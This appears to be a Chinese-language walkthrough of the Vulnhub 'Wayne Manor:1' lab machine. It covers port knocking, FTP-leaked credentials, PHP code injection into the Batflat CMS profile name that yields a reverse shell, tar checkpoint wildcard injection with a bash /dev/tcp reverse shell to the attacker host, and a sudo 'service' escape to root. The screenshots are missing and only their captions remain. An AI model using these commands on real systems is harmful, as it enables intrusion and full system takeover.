Vulnhub: Wayne Manor:1靶机

kali:192.168.111.111

靶机:192.168.111.172

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.172

Vulnhub: Wayne Manor:1靶机_第1张图片

根据提示修改hosts文件

Vulnhub: Wayne Manor:1靶机_第2张图片

访问目标80,在主页发现三组数字,结合端口扫描的结果中21端口被过滤,猜测存在端口碰撞

Vulnhub: Wayne Manor:1靶机_第3张图片

knock -v 192.168.111.172 300 350 400

Vulnhub: Wayne Manor:1靶机_第4张图片

21号端口开放

Vulnhub: Wayne Manor:1靶机_第5张图片

查看ftp中的info.txt,提示账号密码:bruce | alfred_help_me

Vulnhub: Wayne Manor:1靶机_第6张图片

利用该账号密码可以登录网站后台

Vulnhub: Wayne Manor:1靶机_第7张图片

漏洞利用

该网站CMS存在远程代码执行

searchsploit batflat

修改用户信息

Vulnhub: Wayne Manor:1靶机_第8张图片

在用户Displayed name的输入框写入php代码,本地监听后保存,获得反弹shell

& /dev/tcp/192.168.111.111/4444 0>&1'");?>

Vulnhub: Wayne Manor:1靶机_第9张图片

Vulnhub: Wayne Manor:1靶机_第10张图片

提权

利用pspy32收集到计划任务:https://github.com/DominicBreuker/pspy

查看/home/batman/.web/script.sh

Vulnhub: Wayne Manor:1靶机_第11张图片

tar压缩提权

echo 'bash -i >& /dev/tcp/192.168.111.111/5555 0>&1' > root.sh
chmod 777 root.sh
echo '' > "--checkpoint=1"
echo '' > "--checkpoint-action=exec=bash root.sh"

Vulnhub: Wayne Manor:1靶机_第12张图片

Vulnhub: Wayne Manor:1靶机_第13张图片

batman用户sudo权限

Vulnhub: Wayne Manor:1靶机_第14张图片

提权方法:https://gtfobins.github.io/gtfobins/service/#sudo

Vulnhub: Wayne Manor:1靶机_第15张图片

提升为root

sudo -u root service ../../bin/bash

Vulnhub: Wayne Manor:1靶机_第16张图片

flag

Vulnhub: Wayne Manor:1靶机_第17张图片

你可能感兴趣的:(安全,网络安全,web安全)